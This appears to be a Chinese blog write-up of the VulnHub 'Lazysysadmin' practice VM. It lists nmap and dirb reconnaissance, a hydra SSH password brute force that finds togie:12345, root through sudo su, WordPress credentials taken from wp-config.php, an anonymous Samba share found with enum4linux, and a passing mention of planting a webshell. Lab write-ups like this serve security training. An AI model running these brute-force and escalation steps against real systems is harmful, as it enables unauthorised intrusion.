Lazysysadmin靶机

信息收集:

靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip

(1)ip扫描

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:7B:63:B7'

(2)端口扫描

nmap -p- -A 192.168.254.147

(3)目录扫描

dirb http://192.168.254.147

(4)访问页面,拼接/robots.txt

(5)依次拼接,/Backnode_files下发现一些js文件,大概翻了翻,没啥发现

(6)访问/phpmyadmin,尝试弱口令登录,没有成功

(7)访问/wordpress,里面反复强调我的名字是 togie

getshell:

(1)kali使用hydra工具,爆破ssh密码(用户togie),得到密码12345,(rockyou.txt默认路径在/usr/share/wordlists)

cd /usr/share/wordlists
hydra -l togie -P rockyou.txt ssh://192.168.254.147

(2)ssh连接togie,成功连接

ssh togie@192.168.254.147
togie:12345

提权:

(1)查看当前权限,显示为all

sudo -l

(2)直接sudo su提权,提权成功

sudo su

其他:

(1)在/var/www/html/wordpress下的wp-config.php中找到wordpress账号密码

cd /var/www/html/wordpress
admin:TogieMYSQL12345^^

(2)samba服务漏洞,使用enum4linux扫描一下共享文件,发现可以空账号密码访问

enum4linux 192.168.254.147

(3)共享文件名

(4)win+r,输入 \\192.168.254.147\share$ 访问共享文件

\\192.168.254.147\share$

这里可以通过共享文件获取wordpress账号密码,在wordpress后台文件写入一句话getshell

  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值